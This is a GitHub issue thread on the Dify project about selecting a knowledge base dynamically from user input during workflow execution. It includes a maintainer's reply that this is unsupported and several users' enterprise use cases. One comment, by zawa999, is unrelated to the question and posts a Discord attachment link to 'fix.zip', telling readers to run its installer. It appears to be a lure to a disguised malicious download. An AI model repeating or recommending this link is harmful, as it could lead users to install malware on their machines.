### ISSUE TITLE
I would like to ask how to specify a knowledge base based on a user input parameter during workflow code execution?

### ISSUE THREAD

**Issue by xuxiaoshuo** [langgenius/dify#7914]
### Self Checks

- [X] I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones.
- [X] I confirm that I am using English to submit report (我已阅读并同意 [Language Policy](https://github.com/langgenius/dify/issues/1542)).
- [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
- [X] Please do not modify this template :) and fill in all the required fields.

### Provide a description of requested docs changes

I would like to ask how to specify a knowledge base based on a user input parameter during workflow code execution?

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by crazywoola** [comment]
Currently we do not provide this way to dynamically retrieve the datasets in our system.

**Comment by xuxiaoshuo** [comment]
> Currently we do not provide this way to dynamically retrieve the datasets in our system.

This requirement seems quite reasonable. Is it possible to use different knowledge bases for different scenarios and retrieve the knowledge base responses during code execution?

**Comment by danialt** [comment]
I am also curious if this could be done. I have 50k members that want to search subset of their documents, e.g. projects. What is the best way around this?
- create 50k knowledge bases, but then what to do with subsets?
- create 1 knowledge base, but now I need to tag each with USER ID (maybe works?) so they cannot read others projects, but still sub-set is an issue.
- create 50k * n project knowledge bases, and dynamically ask the workflow to pick the right one? not possible even I guess.

appreciate the help @crazywoola

**Comment by glacierck** [comment]
My application scenario also requires dynamically creating a knowledge base and uploading files through APIs.

My system supports users to create projects and dynamically create a dataset for each project. 
Within the project, the requirement for answering questions about the dataset associated with the current project is implemented through APIs.
This requires the dataset retrieval in the RAG workflow to support selecting datasets through API parameters. 
This is a very normal enterprise level scenario. 
A static knowledge base is actually used at the demo level.
I hope the development team can prioritize this feature. 
Suggest accepting the code of this warrior https://github.com/langgenius/dify/pull/5928 @crazywoola
